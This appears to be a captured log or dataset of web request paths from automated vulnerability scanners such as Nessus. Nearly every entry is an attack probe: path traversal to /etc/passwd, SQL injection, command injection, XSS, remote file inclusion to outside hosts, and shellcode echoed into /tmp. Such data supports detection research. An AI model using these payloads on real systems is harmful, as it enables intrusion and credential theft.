/help.php?q='\x0drm q58812882 # /login.php?btag= /cacti/bb-hist.sh?histfile=../../../../../etc/passwd /recordings/way-board/way-board.cgi?db=/etc/passwd\x00 /scripts/showcat.php?cat=1' /scripts/encoder.php /javascript/https.exe /main.php?stuff="&ping\x0c-w\x0c11000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c /n9xlumt5.fts? /-i've already sent a mail to the technical team at titus/ /main.php?stuff=";sleep 10 # /webdav/phprun.php?cmd=c:\caseyobrien.exe /hosting_passwd/ /top.php?stuff='uname >q76482731 # /cgi-bin/shop.pl/page=;cat shop.pl| /yef5f3d5.kspx? /prescription-valium/ /cgi-exe/ion-p.exe?page=c:\winnt\repair\sam /j4rdyhw8.php? /index.php?id=9_8hm4y9d6' /examples/jsp/jsp2/el/help/index.php?help_file=../../../../../../../../../../../etc/passwd //etc/passwd /static///../../../../../../../..etc/passwd /aj3pf49c.fts? /javascript/.htpasswd.sfish/9-1 /en-us/account/mmstdod.cgi?alternate_templates=| echo "content-type: text/html";echo "" ; id\x00 /fnwhrxyd.mscgi? /javascript/1995.exe /nessus\..\..\..\..\..\..\winnt\win.ini /javascript/down.exe /fitt's_law/ /vbscript_examples/ /javascript/templ.exe /javascript/prv.exe /top.php?stuff="ping\x09-w\x099000\x09-n\x091\x091.2.3.4&rem\x09 /subscriptions.csproj /cgi-win/gw5/gwweb.exe?help=bad-request /fcgi-bin/ion-p.exe?page=c:\winnt\repair\sam /scripts/w04ukbv54ixz.php /zuihld5m.php? /examples/jsp/num/viewcvs.cgi/?cvsroot= /b4vng02k.dll? /quagynka.php? /8t9v8k7x.php? /examples/jsp/error/index.php?id='union/**/select/**/0,0,173444095,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /? /scripts/mylog.html?screen=/etc/passwd /javascript/reporting.exe /scripts/styles.php?toroot=/etc/passwd\x00 /cgi/gw5/gwweb.exe?help=bad-request /top.php?stuff=;uname >q28242581 # /main.php?logout="\x0drm\x09q83433457\x09# /scripts/b0j2ijssh6cu.php /recordings/search= /forum1.asp?n=1753&nn=`/etc/passwd` /fmnveedu.dll? /user.php?caselist[bad_file.txt][path]=http://192.168.202.118:8080/tzhfyzkbomspvm?&command=cat /etc/passwd /phpmyadmin//..\..\..\..\..\..\..\..\etc/passwd /slaktoolscripts/ /9ko6m4c8.mscgi? /script/menu/menuadministration.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz? /cgi-bin/item.fts?href=">; /examples/jsp/jsp2/jspx/listrec.pl?app=qmh-news&template=;ls /etc| /examples/jsp/jsp2/el/quickstore.cgi?page=../../../../../../../../../../etc/passwd\x00html&cart_id= /phpmyadmin/styles.php?toroot=/etc/passwd\x00 /javascript/document.out /d7ktpmcq.dll? /9ko6m4c8.kspx? /sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd /forum-ra_professionnel.asp?n=/etc/passwd /ap58k3ci.asp? /admin/news.admin.php?path_to_script=http://192.168.202.96:8080/4dckqcc0acprbz??&cmd=ls /javascript/htpasswd.nsf /scripts/index.php?show=/etc/passwd /main.php?logout="ver,>q59646442&rem, /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332008331 /scriptblocking_service/ /? /hipkz026.mscgi? /scripts/index.php?id=823dwrvmfh' /phpmyadmin/?mod=read&id=../../../../../../../../../../../../../etc/passwd\x00 \..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini /javascript/zorum.exe /modules/forums/bb_smilies.php?bgcolor1=\"> /scripts/wx4z4gedhl0l.pl /examples/jsp/jsp2/jspxfaq.php?skin=../../admin/manager&tplpath=admin /uc3w3bdi.aspx? /weq93ppb.cfm? /qhvu0pdg.jsp? /ywaxntrx.kspx? /javascript/tiki.exe /yef5f3d5.php? /library/adodb/server.php?sql='adodb_sql_sql_injection.nasl /javascript/stories.exe /6dlc2zm9.mscgi? /javascript/cron.exe /examples/servlets/servlet/faq.php?action=&type=view&s=&id=-1' union select 0,184558504,0,0,0,0,0-- /w4996nr0.cfc? /scripts/buoalakxhatu.php3 /top.php?stuff=;uname\x09>q51161767\x09# /admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/no4ghqiguzhst? /passwd-announce/ /8t9v8k7x.cfm? /hjdzm96v.php3? /y8pmygrp.x? /scgi-bin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /cgi-bin/index.php?id='union/**/select/**/0,0,1260750836,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /scripts/billing/billingmanager_income.asp /javascript/shops.exe /~/.aspx /scripts/9pen4xzgztjn.php /subscriptions.rar /javascript/synapse.exe /examples/jsp/sessions/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd|| /zroo33l4.idc? /9o6g5vkn.jsp? /1qwv2p5p.html? /examples/jsp/error/index.php?cid=' /fc9t54l7.mscgi? /en-us/9kr0ih0v.x? //a="%3cscript%20src=%27http://www.example.com/test?rnd=q29825452%27%3e%3c%2fscript%3e";document.writeln(unescape(a)) /script/ident/loginmodif.php?path_inc=http://192.168.202.118:8080/ghl9il? /87_ben dover's cheek mates/ /ows-bin/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe /main.php?stuff='&uname >q14199491 # /cgi-bin/vpasswd.cgi /main.php?logout=&ver,>q24489971&rem, /script/plugins/phpgacl/admin/index.php?path_inc=http://192.168.202.118:8080/ghl9il? /newslettersubscription/ /ap58k3ci.fts? /cgi-home/r.cgi?file=../../../../../../../../../../etc/passwd /scripts/qop0sa1auif9.php3 /phpmyadmin/a1disp3.cgi?/../../../../../../etc/passwd /index.php?c=access&a=login&ref_c=nessus">&ref_a=projectpier_login_page_xss.nasl"> /en-us/account/search.php?searchstring= /rbec2ohx.php3? /help.php?q=";rm\x09q21654461\x09# /uvazfs7p.jspa? /scripts/piywzua5hwer.pl /scripts/index.php?op=default&date=200607' union select 1,1423223114,1,1,1,1,1,1,1,1--&blogid=1 /scripts/index.php?kietu[url_hit]=http://xxxxxxxx/ /o6ebbirj.php3? /examples/jsp/cal/install.php?newlang=../../cpg_error.log\x00 /scripts/index.php?board=nonexistant1474674258 /scripts/viewpage.php?file=/etc/passwd /hjdzm96v.do? /subscriptions.php /en-us/s7qus4g3.do? /o6ebbirj.html? /examples/servlets/servlet/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_57mxcga2]));die;/* /aaron's-autos/ /fnwhrxyd.jsp? // /rpxyx07v.php? /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/bin/echo+-en+"\0174\0044\0000\0377\0347"+>>+/tmp/dhbiyrztiq0;')."]=1 /javascript/removal.exe /javascript/crons.exe /scripts/db4web_c.exe/dbdirname/c:\boot.ini /comments.php?scriptpath=http://192.168.202.118:8080/tzhfyzkbomspvm?? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+5b+e8+57+00+00+00+01+d3+5e+5a+5f+58+ff+e3+e8+ed+ff+ff+ff+7f+e9+f1+6f+57+69++>>ctdn /manager/usrdetails.php?sgnuptype=csaleid /i7prbs22.exe? /bn857frh.html? /examples/jsp/cal/htgrep/file=index.html&hdr=/etc/passwd /examples/jsp/num/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini /ydexw8by.jsp? /phpmyadmin/al_initialize.php?alpath=/etc/passwd\x00 /subscriptions.mdb /examples/jsp/sessions/search/show.pl?url=file:/etc/passwd /main.php?logout='&rm q65442989 # /javascript/replica.exe /examples/servlets/servlet/feedsplitter.php?format=../../../../../../../../../../etc/passwd\x00&debug=1 /script/menu/menuprincipal.php?path_inc=@rfiurl /main.php?logout="ping\x0c-w\x0c11000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c /examples/jsp/cal/nessus">/ /en-us/n9xlumt5.cfc? /examples/jsp/cal/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00 /d5a5renl.kspx? /ddoworrl.pl? /index.php?page=/etc/passwd\x00 /base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1 /javascript/document.7z /usingascripttoaddadomainusertoalocalgroup/ /scripts/vhost.php?action=logout&time=1331904195 /javascript/reports.exe /ny1b3qq4.dll? /de3v2dd9.pl? /rv98iwjp.fts? /cgi-home/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc /javascript/premium.exe /javascript/misc.exe /javascript/usa.exe /bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../../etc/passwd\x00 /evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332010414,1557267964 -- /help.php?q=&del;q31933452&rem; /howtoimportsubscriptions/ /javascript/root.exe /script/tick/test.php?path_to_code=http://cirt.net/rfiinc.txt? / /javascript/piranha.exe /examples/jsp/error/search.jsp?q=%" /5qnlm5z2.htm? /cgi-bin/webdist.cgi?distloc=;cat /etc/passwd /u95h6ymu.kspx? /en-us/dda2qr7j.htm? /help.php?q='del\x09q97653798\x09# /en-us/esmozg5d.nsf? /vjbrrppi.asp? /javascript/server.exe /msadc/..\xc1%pc..\xc1%pc..\xc1%pc..\xc1%pc..\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\+/og /script/common.inc.php?path_inc=http://cirt.net/rfiinc.txt? /0u75ldxq.mscgi? /xfkun1ku.aspx? /scripts/news.scr.php?globals[pth][classes]=http://192.168.202.118:8080/ghl9il?? /t3af3tdz.kspx? /javascript/www3.exe /rpxyx07v.jsp? /main.php?stuff="\x0ddel q77128449 # /ybz5rz7a.kspx? /cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.96:8080/ipb5ri?? / /recordings/minis.php?month=../../../../../../etc/passwd /manager/index.php?id='union/**/select/**/0,0,1318083641,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /examples/jsp/jsp2/jspx/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold /manager/index.php?id=urjhxcl19w' /view_user.php?list=1&letter=&sort_by='select /u8yiqilu.exe? /bash_script/ /scripts/index.action /qczkquis.mscgi? /xfkun1ku.html? /o35zot2r.asp? /javascript/classes.exe /ny1b3qq4.exe? /bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd /jw64yq8u.mscgi? /examples/jsp/cal/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00 /examples/servlets/servlet/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\x00 /examples/jsp/checkbox/listrec.pl?app=qmh-news&template=;ls /etc| /lsoix5h3.cgi? /i7prbs22.pl? /index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd /cgis/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe /javascript/png.exe /main.php?stuff=;uname\x09>q56931967\x09# /cgi-bin/search.jsp?q=%" /subscriptions.jar /javascript/cfusion.exe /page.exe /main.php?stuff=del;q76531174&rem; /edv3mapy.cfc? /scripts/mapserv.exe?map=mapserver_detect.nasl.map /awstats/awstats.pl?migrate=|echo;/bin/echo -en "zj\0003x\0315\0200xp1\0322\0262\0377\0266\0377\0001\0320" >> /tmp/vsnlklmgzu0;echo|awstats693389.txt /i686v90l.kspx? /cgi-bin/verify.asp?username=' /examples/jsp/jsp2/el/index.php?templates_dir=/etc/passwd\x00 /en-us/n9xlumt5.idc? /javascript/phpmyadmin.exe /javascript/opengts.exe /javascript/document.fcgi /u8yiqilu.php? /m4kkjf8l.cgi? /scripts/ycqbbdpf.exe / /scripts/sources/functions.php?root_path=/etc/passwd\x00 /en-us/ddoworrl.pl? /dslpwt15.htm? /q703m78q.html? /top.php?stuff="ping\x09-w\x099000\x09-n\x091\x094.3.2.1|rem\x09 /athenareg.php?pass= ;cat /etc/passwd /javascript/read.exe /scripts/1hactwocbsuo.sh /webdav/phprun.php?cmd=c:\wce.exe -r /w4996nr0.exe? /en-us/dda2qr7j.kspx? /top.php?stuff=&del;q55714714&rem; /de3v2dd9.exe? /scripts/admin/admin.php /hipkz026.html? /path_script/createurl.php?formurl=http://192.168.202.96:8080/ipb5ri? /nuh3zirz.cfm? /33y9gcqq.jspa? /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\x00 /recordings/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w /cacti/wiki.php/ /examples/jsp/error/shoutbox.php?conf=../ /main.php?stuff=";rm\x09q74362376\x09# /en-us/ddoworrl.exe? /script_peardb/ /script/ident/disconnect.php?path_inc=http://192.168.202.118:8080/ghl9il? /main.php?stuff="ping\x09-w\x0911000\x09-n\x091\x094.3.2.1|rem\x09 /burning cd-r's/ /scripts/qowmcdks.exe /manager/cwmail.exe /cgi-bin/sources/functions.php?root_path=/etc/passwd\x00 /raanw4ia.cgi? /0qhcnefz.fts? /scripts/log/nether-log.pl?checkit /script/ident/loginmodif.php?path_inc=http://cirt.net/rfiinc.txt? /help.php?q="\x0adel\x09q76195479\x09# /bn857frh.fts? /cacti/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\x00 /examples/jsp/num/minis.php?month=../../../../../../etc/passwd /de3v2dd9.x? /ju0u7kfo.kspx? /miz4r5hz.kspx? /scripts/mmstdod.cgi?alternate_templates=| echo "content-type: text/html";echo "" ; id\x00 /p043snfr.pl? /scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,003352643884,4,5,6,7,8,9,10,11-- /manager/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00.txt /fcgi-bin/texis.exe/junk /en-us/9kr0ih0v.kspx? /7uz3ok60.html? /? /phpmyadmin/index.php?post=../config/password /esmozg5d.aspx? /javascript/suite.exe /ows-bin/gwweb.exe?help=bad-request /includes/tellafriend.php?about=game&gamename= /en-us/i686v90l.dll? /scripts/onwkbtts3uj1.cfm /en-us/hipkz026.exe? /admin/index.php?path_to_script=http://192.168.202.118:8080/tzhfyzkbomspvm??&cmd=ls /h21y8w52.php? /weq93ppb.cfc? /examples/jsp/jsp2/el/search.jsp?q=%" /manager/ion-p.exe?page=c:\\winnt\\win.ini /scripts/message/message_dialog.tml?how_many_back=\"> /scripts/www/delivery/ac.php?bannerid=-610+or+1=1 /cgi-bin/index.php?templates_dir=/etc/passwd\x00 /en-us/account/bb_func_txt.php?pathtofiles=/etc/passwd\x00 /examples/jsp/jsp2/el/c32web.exe/getimage?imagename=cart32.ini\x00.gif /d7ktpmcq.nsf? /javascript/hide.exe /ddoworrl.php3? /n9xlumt5.cgi? /egaet53a.cfm? /"real+estate"/ /i686v90l.idc? /l4fz1dqw.htm? /w4996nr0.mscgi? /zuihld5m.cgi? /examples/jsp/cal/newsscript.pl?mode=admin /javascript/flow.exe /scripts/admin/cal_login.php /cgi-bin/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl /cgi-bin/index.php?gadget=../../../../../../etc/passwd\x00&path=/etc /en-us/jnv890lt.html? /scripts/a1stats/a1disp3.cgi?../../../../../../../etc/passwd /scripts/faq.php?action=&type=view&s=&id=-1' union select 0,830002278,0,0,0,0,0-- /examples/jsp/colors/commerce.cgi?page=../../../../../etc/passwd\x00index.html /main.php?logout=&rm;q42123677&rem; /eg2u8pbv.dll? /main.php?logout=uname >q97855547 # /en-us/account/starnet/addons/slideshow_full.php?album_name='1240931377 /i686v90l.pl? /index.php?template=../../../loudblog/custom/config.php\x00 /.pl /javascript/migrated.exe /3hlysl2x.do? /byrg33fw.dll? /weq93ppb.kspx? /i686v90l.cfm? /m4kkjf8l.cgi? /scripts/www/delivery/ac.php?bannerid=-787+or+1=1 /nyvbv05h.do? /scripts/nryr3lvrjnwx.php3 /help.php?q='|sleep 10 # /javascript/toolkit.exe /a0imiuf1.aspx? /help.php?q="del\x0cq49751234&rem\x0c /de3v2dd9.html? /606wkcop.asp? /comments.php?scriptpath=@rfiurl?scriptpath=@rfiurl? /examples/jsp/num/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd| /jw64yq8u.do? /iv5vkgam.cfc? /scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file¤tfolder=/fckeditor_currentfolder_file_upload-1331905254.php. /u95h6ymu.x? /scripts/www/delivery/ac.php?bannerid=-302+or+1=1 /m4kkjf8l.php3? /cgi/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00 /i've shifted some donated artscene stuff to artscene/ /cgi-bin/www/delivery/ac.php?bannerid=-1331919146+or+1=1+--+';passthru(base64_decode($_server[http_nessus_oxjf6sek]));die;/* /cgi-bin/cmd.exe?/c+dir /en-us/h5sc3gxy.exe? /en-us/7o5qp766.cgi? /en-us/n9xlumt5.jspa? /cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331923197',null,null,null,null -- /phpmyadmin/pfdispaly.cgi?../../../../../../etc/passwd /i2n4v4rl.idc? /examples/jsp/sessions/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl /cgi.cgi/ppdscgi.exe /cacti/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\x00 /xfkun1ku.idc? /javascript/real.exe /javascript/.passwd.properties /lmw4r201.cgi? /en-us/account/index.php?string=' /l13b77e5.htm? /examples/jsp/jsp2/el/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w /t7tm4m0b.mscgi? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+8b+48+04+01+d1+89+4d+fc+8b+78+08+8b+40+0c+01+d0+01+d7+89+45+f8+73+27+60+8b++>>esbq /7dbjwpw6.dll? /main.php?stuff="ping\x0c-w\x0c8000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c /nsn/..\util/glist.bas /de3v2dd9.cfm? /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 /subscriptionsite/ /scripts/piywzua5hwer.cfm /? /eg2u8pbv.asp? /922_tony hawk's american wasteland/ /netutils/ipdata.stm?ipaddr= /examples/jsp/num/bandwidth/index.cgi?action=showmonth&year=&month= /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+1a00+>>esbq /manager/index.php?entry=' /addvip.php?msetstr["progsdir"]=http://192.168.202.96:8080/whmch8ftkt7kv? /javascript/axis.exe /examples/servlets/servlet/home/search.asp?nchannel='1 /9kr0ih0v.html? /javascript/updated.exe /help.php?q="\x0drm q44862556 # /b4vng02k.fts? /pxagj7n7.html? /scripts/event_view.php?eid=34 union select 1982082250 /scripts/index.php?id=kis0atfdu6' /bxnyrhmh.htm? /aj3pf49c.do? /en-us/account/htsearch?exclude=`/etc/passwd` /fmnveedu.asp? /gepi/gestion/savebackup.php?filename=http://192.168.202.118:8080/moclyxlwqyfjnp?&cmd=cat/etc/passwd /esmozg5d.fts? /6dlc2zm9.fts? /main.php?stuff='|sleep\x0911\x09# /scripts/config.php?returnpath=/etc/passwd\x00 /gumpscripts/ /phpmyadmin/includes/config.php?relative_script_path=http://xxxxxxx /en-us/9kr0ih0v.cfm? / /j734qobz.cfc? /scripts/w04ukbv54ixz.sh /rv98iwjp.x? /help.php?q="&rm\xa0q55891755&rem\xa0 /ht8pn8uq.pl? /phpmyadmin/wa.exe?debug-show-version /how_to.../ /examples/jsp/sessions/feedsplitter.php?format=../../../../../../../../../../etc/passwd\x00&debug=1 /examples/jsp/num/index.php?gadget=../../../../../../etc/passwd\x00&path=/etc /bxnyrhmh.mscgi? /phpmyadmin/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\x00 /examples/jsp/jsp2/jspx/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc /appserver.exe/ /cacti/index.php?include_files[]=&include_files[query_string]=/etc/passwd /d765w06j.fts? /en-us/w4996nr0.php? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+00+00+00+00+00+00+00+30+00+00+70+00+00+00+00+00+00+00+00+00+00+00++>>esbq /examples/jsp/jsp2/el/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd|| /millscript-vfs/ /fxm.exe /uvazfs7p.kspx? /cgi-bin/index.php?src=1&_common=1&time=1332009308&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /scripts/pm/add_ons/mail_this_entry/mail_authocheck.php?pm_path=http://xxxxxxxx./&sfx=.txt /scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/llumt7msyau5y? /phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1bar /examples/jsp/jsp2/elfaq.php?skin=../../admin/manager&tplpath=admin /vac1l5vm.jsp? /cgi-914/htimage.exe/path/filename?2,2 /cacti/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\x00 /javascript/.passwd.js /rbec2ohx.cfc? /scripts/ylrvly9nh_pf.html /examples/jsp/error/starnet/addons/slideshow_full.php?album_name='273385930 /confirmunsubscription.php?output=http://cirt.net/rfiinc.txt? /scriptableinpython/ /jnt3f86c.kspx? /y8pmygrp.asp? /d5a5renl.jspa? /en-us/account/cgiwrap/cgiwrap_error_page_handling_xss.nasl /examples/jsp/sessions/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- /main.php?stuff="del\x09q84368944\x09# /login_up.php3?login_name=x&passwd=x&locale_id=../../../../../../../../../../../../boot.ini\x00.jpg /fnwhrxyd.htm? /dslpwt15.exe? /examples/jsp/cal/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id /examples/jsp/colors/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\x00 /en-us/oie504mr.htm? /nyjgaorz.fts? /a1xss4e81e93yp/ /oie504mr.x? /main.php?stuff="&ping\x0c-w\x0c11000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;/tmp/fppatbfqdp;" /8x6w469u.cgi? /examples/servlets/servlet/forumdisplay.php?fid=21"> /script/menu/menuadministration.php?path_inc=@rfiurl /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008322&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /quikmail/nph-emumail.cgi?type=../\x00 /javascript/dock.exe /scripts/bveygnpo6hkw.asp /"united+kingdom"/ /scripts/faq.php?action=&type=view&s=&id=-1' union select 0,129517196,0,0,0,0,0-- /scripts/bveygnpo6hkw.html /www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_3gocdeon]));die;/* /awstats/awstats.pl?migrate=|echo;/bin/echo -en "vj\0001j\0002\0211\0341j\0001jfx\0133\0315\0200\0222" >> /tmp/vsnlklmgzu0;echo|awstats623172.txt /javascript/favorites.exe /6n7aacgg.mscgi? /help.php?q="\x0drm q43695626 # /javascript/company.exe /ows-bin/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|' /jnt3f86c.x? /scripts/index.php?board=nonexistant1270483518 /scripts/fgos1sb1c1tr.cfm /main.php?stuff="ping -w 7000 -n 1 4.3.2.1|rem /javascript/.htpasswd.sfish/sfish>'>"> /examples/jsp/jsp2/jspx/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00 /phpmyadmin/documentation.html?phpmyadmin=;cat /etc/passwd; /examples/jsp/num/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /?\"> /javascript/skin.exe /main.php?stuff="\x0arm\x09q95586715\x09# /javascript/sendto.exe /inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\x00 /help.php?q="&ping\xa0-w\xa011000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /help.php?q="&rm\x09q27972468&rem\x09 /scripts/wiki/rankings.php /if69ddo1.pl? /javascript/matt.exe /en-us/hipkz026.cgi? /webcgi/pfdispaly.cgi?../../../../../../../../../../etc/passwd /i686v90l.aspx? /cgi-915/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /examples/jsp/jsp2/el/sojourn.cgi?cat=../../../../../etc/passwd\x00 /main.php?stuff="&ping\xa0-w\xa010000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /v3axg1p8.asp? /scripts/admin/login.html /dda2qr7j.php? /cgibin/testcgi.exe /en-us/account/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd /apavxugx.php? /m-scriptz/ /phpmyadmin/phf?qalias=x\x0a/bin/cat /etc/passwd /scripts/starnet/addons/slideshow_full.php?album_name='1283310915 /7uz3ok60.cfc? /scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.96:8080/4dckqcc0acprbz? /edzaia0i.x? /vac1l5vm.fts? / /scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/vir0v3xfc? /scripts/wspd_cgi.sh/wservice=wsbroker1/webtools/oscommand.w /manager/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1 /scripts/rvckwz6smkqf.html /scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1974863202,2,2009798962,4,5,6,7,8,9,0,1,2,3 -- /javascript/unlock.exe /s7qus4g3.php? /lib/scripts/jquery/jquery-ui-theme/images/ui-bg_flat_75_ffffff_40x100.png /page/1,10966,,00.html?var= /scripts/lrn28issfuqi.inc /javascript/transaction.exe /examples/jsp/error/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null-- /cgi-bin/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org /o6ebbirj.pl? /scs86g1p.php? /ao22ww7y.pl? /examples/jsp/cal/cgiip.exe/wservice=wsbroker1/webutil/ping.p /en-us/account/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /scripts/2sfdqydfaknx.cgi /en-us/esmozg5d.fts? /cgibin/.htpasswd /examples/jsp/jsp2/el/view_user.php?list=1&letter=&sort_by='select /xfkun1ku.aspx? /examples/jsp/num/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc /examples/jsp/error/phptonuke.php?filnavn=/etc/passwd /mpcgi/vssetcookie.exe /help.php?q="&ver,>q66241785&rem, /yef5f3d5.exe? /exchange/..\xc1\x1c..\xc1\x1c..\xc1\x1c..\xc1\x1c..\xc1\x1c../winnt/system32/cmd.exe?/c+dir+c:\+/og /phpmyadmin/index.php?page=/etc/passwd\x00 /slideshow.php?name="> /help.php?q="ping;-w;10000;-n;1;1.2.3.4&rem; /cgi.cgi/gw5/gwweb.exe?help=bad-request /top.php?stuff="ping,-w,10000,-n,1,4.3.2.1|rem, /? /cgi-bin/doc/index.php?s=/etc/passwd\x00 /7o5qp766.x? /recordings/search.php?submit=true&search='); /6n7aacgg.php3? /opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/llumt7msyau5y?\x00 /en-us/dda2qr7j.idc? /aj3pf49c.jsp? /ghswfouu.idc? /scripts/msmmask.exe?mask=/junk334 /examples/jsp/cal/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd /manager/index.php?configfile=../../../../../../../../../etc/passwd /cgi-bin/sendtemp.pl?templ=../../../../../etc/passwd /forum1_professionnel.asp?n=1771&nn=100&page=/.\"./.\"./.\"./.\"./.\"./boot.ini /project_description/ /help.php?q=&ver\x09>q15757572&rem\x09 /iajtej82.cgi? /jnv890lt.idc? /examples/jsp/jsp2/jspx/index.php?include_files[]=&include_files[query_string]=/etc/passwd /bl8sefdm.exe? /u95h6ymu.jspa? /en-us/33y9gcqq.cfm? /examples/jsp/sessions/admin/top.php?admindir=/etc/passwd\x00 /examples/jsp/sessions/core/api.php?t_path_core=/etc/passwd\x00 /scripts/qbch5ojumj32.shtml /javascript/intranet.exe /en-us/.mscgi /space1105xss_145/ /javascript/solve.exe /jnv890lt.php3? /cgi-bin/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd /vac1l5vm.php? /opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/vir0v3xfc?\x00 /phpmyadmin/documentation.html?phpmyadmin=../../../../../../../../etc/passwd /javascript/weblog.exe /en-us/h5sc3gxy.php3? /examples/jsp/error/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd /d7ktpmcq.php? /ectpasswd/ /primalscript/ /scripts/nimages.php /phpmyadmin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; /.../.../.../.../.../.../.../.../.../boot.ini /en-us/account/pfdispaly?../../../../../../etc/passwd /help.php?q="uname >q92991511 # /zln2hm2z.idc? /examples/jsp/checkbox/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd /3m5knyc4.asp? /en-us/account/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\x00 /cgi-bin/openview5.exe?target=main&action=../../../../../../../../../..//windows/win.ini /top.php?stuff="rm\xa0q56682636&rem\xa0 /igtf0zon.cgi? /top.php?stuff='\x0auname >q54187211 # /phpmyadmin/documentation.html?phpmyadmin=../../../../../../../../etc/passwd\x00.html /main.php?logout="rm q41454446&rem /j4rdyhw8.mscgi? /d765w06j.pl? /javascript/networking.exe /phpmyadmin/top.php?header=../../../../../../../../etc/passwd /script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=http://192.168.202.118:8080/ghl9il?? /en-us/account/index.php?include_files[]=&include_files[query_string]=/etc/passwd /en-us/account/index.php?page=documents&doc=-99' union select 